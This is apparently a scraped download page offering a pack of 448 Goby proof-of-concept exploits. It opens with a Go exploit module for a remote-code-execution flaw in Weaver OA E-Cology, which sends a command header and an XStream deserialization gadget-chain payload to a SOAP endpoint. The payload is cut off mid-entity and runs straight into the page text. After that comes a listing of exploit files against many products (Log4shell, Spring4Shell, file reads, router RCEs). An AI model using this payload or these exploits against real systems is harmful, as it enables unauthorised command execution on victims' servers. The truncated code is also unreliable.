package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
func init() {
expJson := `{
"Name": "Weaver OA E-Cology Workflowservicexml RCE",
"Description": "Weaver OA E-Cology Workflowservicexml RCE",
"Product": "Weaver OA E-Cology",
"Homepage": "https://www.weaver.com.cn/",
"DisclosureDate": "2021-05-19",
"Author": "PeiQi",
"GobyQuery": "app=\"Weaver-OA\"",
"Level": "3",
"Impact": "RCE",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": null,
"Tags": ["RCE"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Weaver OA"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/services%20/WorkflowServiceXml"
cfg := httpclient.NewPostRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "text/xml")
cfg.Header.Store("Cmd", "net user")
cfg.Data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest><web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                &#x
没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
Goby 最全最新POC共计448个 包含了致远OA A6 用户敏感信息泄露、Apache_Druid_Log4shell_CVE_2021_44228、Apache_JSPWiki_Log4shell_CVE-2021-44228、VMware_NSX_Log4shell_CVE_2021_44228、VMware_vCenter_Log4shell_CVE_2021_44228_1、Wayos AC集中管理系统默认弱口令 CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313、Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210、Micro_module_monitoring_system_User_list.php_
资源详情
资源评论
资源推荐
收起资源包目录
Goby 最全最新POC共计448个 (448个子文件)
Weaver_OA_E_Cology_Workflowservicexml_RCE.go 84KB
Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go 81KB
ForgeRock_AM_RCE_CVE_2021_35464.go 25KB
TopSec_TopACM_Remote_Command_Execution.go 10KB
H3C CVM Arbitrary File Upload Vulnerability.go 10KB
landray_oa_treexml_rce.go 10KB
Tongda OA Arbitrary User Login Vulnerability.go 10KB
CNPOWER OA Arbitrary File Upload Vulnerability.go 10KB
nsfocus_resourse.php_arbitrary_file_upload_vulnerability.go 9KB
showDocGo.go 8KB
Atlassian_Confluence_Webwork_OGNL_Inject_CVE_2022_26134.go 8KB
TRS-MAS testCommandExecutor.jsp Remote Command Execution.go 6KB
F5_BIG_IP_login_bypass_CVE_2022_1388.go 6KB
showDocJson.go 6KB
ESAFENET_DLP_dataimport_RCE.go 6KB
H3C_IMC_dynamiccontent.properties.xhtm_RCE.go 6KB
Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go 6KB
Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go 5KB
Tongda_OA_api.ali.php_RCE.go 5KB
QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.go 5KB
Webgrind_File_read_cve_2018_12909.go 5KB
Many_network_devices_have_arbitrary_file_downloads.go 5KB
Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go 4KB
FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go 4KB
Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go 4KB
SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go 4KB
TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go 4KB
AceNet_AceReporter_Report_component_Arbitrary_file_download.go 4KB
dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go 4KB
SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go 4KB
SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go 4KB
Panabit_Application_Gateway_ajax_top_backstage_RCE.go 4KB
WangKang_Next_generation_firewall_router_RCE.go 4KB
Panabit_iXCache_ajax_cmd_backstage_RCE.go 4KB
Panabit_Panalog_cmdhandle.php_backstage_RCE.go 4KB
ZhongQing_naibo_Education_Cloud_platform_reset_password.go 4KB
Jellyfin_Audio_File_read_CVE_2021_21402.go 4KB
ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go 4KB
ShiziyuCms_wxapp.php_File_update.go 4KB
xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go 4KB
ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go 4KB
JEEWMS_Arbitrary_File_Read_Vulnerability.go 4KB
SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go 3KB
NVS3000_integrated_video_surveillance_platform_is_not_accessible.go 3KB
Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go 3KB
Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go 3KB
Apache Solr Log4j JNDI RCE.go 3KB
Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go 3KB
Holographic_AI_network_operation_and_maintenance_platform_RCE.go 3KB
HEJIA_PEMS_SystemLog.cgi_Arbitrary_file_download.go 3KB
Many_network_devices_have_password_leaks.go 3KB
ShopXO_download_File_read_CNVD_2021_15822.go 3KB
WangKang_NS_ASG_cert_download.php_File_read.go 3KB
Huijietong_cloud_video_fileDownload_File_read.go 3KB
SECWORLD_Next_generation_firewall_pki_file_download_File_read.go 3KB
D_Link_Dir_645_getcfg.php_Account_password_disclosure_CVE_2019_17506.go 3KB
Selea_OCR_ANPR_SeleaCamera_File_read.go 3KB
D_Link_ShareCenter_DNS_320_system_mgr.cgi_RCE.go 3KB
Selea_OCR_ANPR_get_file.php_File_read.go 3KB
ACTI_camera_images_File_read.go 3KB
LanhaiZuoyue_system_download.php_File_read.go 3KB
LanhaiZuoyue_system_debug.php_RCE.go 3KB
Kingdee_EAS_server_file_Directory_traversal.go 3KB
ZZZCMS_parserSearch_RCE.go 3KB
ZhongkeWangwei_Next_generation_firewall_File_read.go 3KB
TamronOS_IPTV_ping_RCE.go 2KB
JingHe_OA_download.asp_File_read.go 2KB
nsoft_EWEBS_casmain.xgi_File_read.go 2KB
H3C_Next_generation_firewall_File_read.go 2KB
H3C_HG659_lib_File_read.go 2KB
Huijietong_cloud_video_list_Information_leakage.go 2KB
ShiziyuCms_ApigoodsController.class.php_SQL_injection.go 2KB
ShiziyuCms_ApiController.class.php_SQL_injection.go 2KB
HanWang_Time_Attendance_SQL_injection.go 2KB
H3C_SecPath_Operation_Login_bypass.go 2KB
Zhongxing_F460_web_shell_cmd.gch_RCE.go 2KB
Qilai_OA_CloseMsg.aspx_SQL_injection.go 2KB
Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json 19KB
Spring_Cloud_Gateway_Actuator_API_SpEL_Code_Injection_CVE_2022_22947.json 14KB
Apache_HTTP_Server_SSRF_CVE-2021-40438.json 12KB
Atlassian_Jira_Path_Traversal_CVE_2021_26086.json 12KB
Apache_HTTP_Server_SSRF_CVE_2021_40438.json 12KB
CVE_2022_22947.json 11KB
Spring_Boot_Actuator_Logview_Path_Traversal_CVE_2021_21234.json 10KB
Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210.json 10KB
Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json 10KB
Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json 9KB
HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json 9KB
Jetty_WEB_INF_FileRead_CVE_2021_34429.json 9KB
VMware_NSX_Log4shell_CVE-2021-44228.json 8KB
Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json 8KB
VMware_NSX_Log4shell_CVE_2021_44228.json 8KB
DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json 7KB
WSO2_Management_Console_Unrestricted_Arbitrary_File_Upload_RCE_CVE_2022_29464.json 7KB
VMware_vCenter_Log4shell_CVE-2021-44228_(1).json 7KB
Tianwen_ERP_system_FileUpload_CNVD_2020_28119.json 7KB
Weblogic_SSRF.json 7KB
VMware_vCenter_Log4shell_CVE_2021_44228_1.json 7KB
H3C_IMC_RCE.json 7KB
Spring_Framework_Data_Binding_Rules_Spring4Shell_RCE_CVE_2022_22965.json 7KB
共 448 条
- 1
- 2
- 3
- 4
- 5
qq_40893411
- 粉丝: 0
- 资源: 1
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论1